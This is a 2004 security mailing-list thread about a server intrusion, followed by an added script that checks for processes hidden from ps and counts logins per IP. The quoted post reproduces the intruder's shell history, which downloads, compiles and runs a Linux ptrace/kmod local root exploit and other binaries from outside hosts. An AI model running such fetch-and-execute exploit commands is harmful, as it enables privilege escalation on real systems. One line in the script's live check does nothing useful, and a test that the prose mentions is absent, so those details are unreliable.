Re: Visited by a cracker

From: Louie Miranda (lmiranda_at_gmail.com)
Date: 07/12/04

    Date: Mon, 12 Jul 2004 09:54:35 +0800
    To: focus-linux@securityfocus.com
    
    

    Double check for trojans on your processes, even if you did run
    chkrootkit to check it out.

    like: ps, top, ls

    And try running lsof, if you have the time. Try to look for more
    suspicious programs.

    Thanks,
    Louie

    On Sun, 11 Jul 2004 16:45:09 +0200, Per Christian B. Viken
    <perchr@angryadmin.net> wrote:
    > Hello
    >
    > I've had a rather disturbing evening.
    > A friend of mine runs a small server for himself and some friends. It's
    > running slackware 10.
    > When I logged in, I noticed that the load was way over what's normal (around
    > 1.36 now, usually it's under 0.10), so I run 'top'. I see a program called
    > 'strace' running, hogging all the cpu power.
    >
    > So I get curious. I chdir to the user's home, and look around. It's empty.
    > But, the 'smart' little cracker has forgotten about .bash_history, so here I
    > can see everything that he has been doing.
    > Apparently, he has downloaded and set up an eggdrop, removed it again, and
    > then downloaded a psybnc, which he also removed shortly. Then things get
    > interesting.
    >
    > <SNIP>
    > wget http://personal.telefonica.terra.es/web/alexb/e/ptrace-kmod.c
    > gcc ptrace-kmod.c -o ptrace
    > ./ptrace
    > chmod +x ptrace
    > ./ptrace
    > rm -rf ptrace
    > ls
    > rm -rf ptrace-kmod.c
    > wget www.drac.as.ro/egx
    > chmod +x egx
    > ./egx
    > who
    > passwd
    > Uptime
    > <SNIP>
    > ./egx
    > rm -rf egx
    > wget 220.88.27.11/usage/apache.tar.gz
    > </SNIP>
    >
    > The ptrace-kmod.c has this for a header:
    > /*
    > * Linux kernel ptrace/kmod local root exploit
    > *
    > * This code exploits a race condition in kernel/kmod.c, which creates
    > * kernel thread in insecure manner. This bug allows to ptrace cloned
    > * process, allowing to take control over privileged modprobe binary.
    > *
    > * Should work under all current 2.2.x and 2.4.x kernels.
    >
    > Luckily, the server runs 2.6.6, so this wasn't any threat.
    > The 'egx' executable seems to be somewhat like the other, because when I run
    > it, it outputs '[-] Unable to determine kernel address: Operation not
    > supported' and dies.
    >
    > My guesses are that the apache.tar.gz-file is also some kind of exploit, but
    > I couldn't get it, so I didn't get a chance to see.
    >
    > Seeing that he didn't know how to properly hide his tracks, I hoped he might
    > be stupid enough to use his own IP to log in from as well, so I run 'cat
    > /var/log/messages | grep <username>'.
    > But, he has logged in and out using 7 different IPs. 5 belonging to
    > Pakistan, and the other two to Lebanon.
    >
    > I've been suspicious of this user since my friend added him a few days ago.
    > He actually got a domain, prepaid for three years for an account, so I did
    > have some concerns about this.
    > Now, after discovering this, I've talked with my friend, and the credit card
    > used to pay for the domain belongs to a woman in the UK. Probably stolen
    > or something.
    >
    > I've run chkrootkit 0.43 and Rootkit Hunter 1.1.1 and they didn't find
    > anything.
    > So, my real question is:
    >
    > Is there anything else I should check out? Anywhere else some nasty exploits
    > or trojans might be hiding? And should I try to find this guy? Or is it
    > probably hopeless?
    >
    > Best Regards,
    > Per Christian B. Viken
    >
    > --------------------------------------------
    >  _
    > ( )  ASCII ribbon campaign
    >  X   - against HTML email
    > / \  & vCards
    >
    >

    -- 
    Louie Miranda
    http://www.axishift.com
    
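Louie's advice above is to distrust `ps`, `top` and `ls` on a box where an attacker had a shell, and Per's own triage leaned on `.bash_history` and grepping the logs for the account. The script below is an added example written for this page (it is not code from either poster): it cross-checks the PIDs visible as `/proc/<pid>` directories against what `ps` reports, because a trojaned `ps` can edit its own output but cannot easily hide a plain directory walk, and it tallies `last`-style login records per source address for one user, which is the quick way to get Per's "7 different IPs" answer. It assumes a Linux `/proc` layout and the usual `user tty host date` column order of `last`; the sample login records in the test are constructed, not taken from the incident.

```shell
#!/bin/sh
# Added example for this thread, not the posters' own code.
# Assumes Linux /proc (one numeric directory per process) and a
# `last`-style record format: user tty host date...

# Pure comparison step: $1 = newline-separated PIDs from the /proc walk,
# $2 = newline-separated PIDs from ps. Prints PIDs present in /proc but
# missing from ps. Kept free of live system calls so it can be unit-tested.
pids_missing_from_ps() {
    printf '%s\n' "$2" "---" "$1" | awk '
        /^---$/            { in_proc = 1; next }       # switch from ps list to /proc list
        !in_proc           { seen[$1] = 1; next }      # remember every PID ps admitted to
        in_proc && $1 != "" && !($1 in seen) { print $1 }
    ' | sort -n
}

# Live collection: numeric entries under /proc.
list_proc_pids() {
    for d in /proc/[0-9]*; do
        [ -d "$d" ] && printf '%s\n' "${d#/proc/}"
    done
}

# Live collection: PIDs as reported by ps (no header).
list_ps_pids() {
    ps -eo pid= | tr -d ' '
}

# Run the /proc-vs-ps comparison twice: short-lived processes exit between
# the two listings, so a PID must appear in both runs before it is reported.
run_live_check() {
    first=$(pids_missing_from_ps "$(list_proc_pids)" "$(list_ps_pids)")
    sleep 1
    second=$(pids_missing_from_ps "$(list_proc_pids)" "$(list_ps_pids)")
    echo "PIDs in /proc but absent from ps on both passes (empty is good):"
    pids_missing_from_ps "$first" "$(printf '%s\n' "$second" | awk 'NF' | comm -13 /dev/null - 2>/dev/null || true)" >/dev/null
    printf '%s\n' "$first" | while read -r pid; do
        [ -n "$pid" ] || continue
        printf '%s\n' "$second" | grep -qx "$pid" && echo "$pid"
    done
}

# Count logins per source host for one user from `last`-style text.
# $1 = the text (e.g. output of `last`), $2 = username. Prints "host count".
logins_per_ip() {
    printf '%s\n' "$1" | awk -v u="$2" '
        $1 == u { c[$3]++ }
        END     { for (h in c) print h, c[h] }
    ' | sort
}

# Usage: sh thiscript.sh --live   (runs the /proc vs ps cross-check)
if [ "${1:-}" = "--live" ]; then
    run_live_check
fi
```

For the login tally, `logins_per_ip "$(last -i)" suspectuser` gives one line per source address; a handful of distinct networks for an account that is only days old is exactly the signal Per found by hand. The /proc comparison is the same idea `chkrootkit`'s `chkproc` uses, so an empty result here agrees with the clean `chkrootkit` run but does not prove the kernel itself is untouched: a kernel-level rootkit can hide `/proc` entries as easily as `ps` output, which is why a known-good boot medium or a reinstall is the only definitive answer once root is in doubt.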
